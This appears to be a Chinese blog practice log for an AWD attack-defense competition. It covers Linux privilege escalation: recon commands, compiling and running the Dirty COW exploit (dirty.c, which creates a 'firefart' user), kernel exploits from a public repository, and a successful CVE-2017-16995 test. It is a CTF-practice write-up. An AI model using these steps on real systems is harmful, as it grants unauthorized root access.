为线下AWD准备
主要包括的方式:利用脏牛提权、利用Searchsploit内核漏洞EXP提权、利用SUID+低版本Nmap交互提权。其他利用方式后续补充。

信息收集

uname -a //获取内核版本信息

Linux下提权练习

cat /etc/issue   //查看发行版
cat /etc/*-release

Linux下提权练习

dirtycow

利用内核版本需要≥2.6.22且小于3.9
脏牛PoCsLink

Linux下提权练习

阅读编译方法及Usage,以dirty.c为例

编译
gcc -pthread dirty.c -o dirty -lcrypt
执行
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
利用
// Afterwards, you can either "su firefart" or "ssh firefart@..."

Linux下提权练习
运行到这个时候就卡死了。。。

Linux Kernel Exploits

先编译,后执行,但是没有一个成功 不知道啥原因
Linux下提权练习

Ubuntu 16.04测试 内核版本4.10.0
cve-2017-16995成功
漏洞存在于内核版本小于4.13.9的系统中,漏洞成因为kernel/bpf/verifier.c文件中的check_alu_op函数的检查问题,这个漏洞可以允许一个普通用户向系统发起拒绝服务攻击(内存破坏)或者提升到特权用户。

Linux下提权练习

参考链接
https://github.com/SecWiki/linux-kernel-exploits

SUID提权

相关文章:

  • 2021-12-04
  • 2021-08-12
  • 2021-11-14
  • 2021-07-22
  • 2021-08-17
  • 2021-07-19
  • 2022-01-20
  • 2021-11-22
猜你喜欢
  • 2022-01-09
  • 2021-09-10
  • 2022-03-06
  • 2022-12-23
  • 2021-11-12
  • 2021-11-08
  • 2022-01-31
相关资源
相似解决方案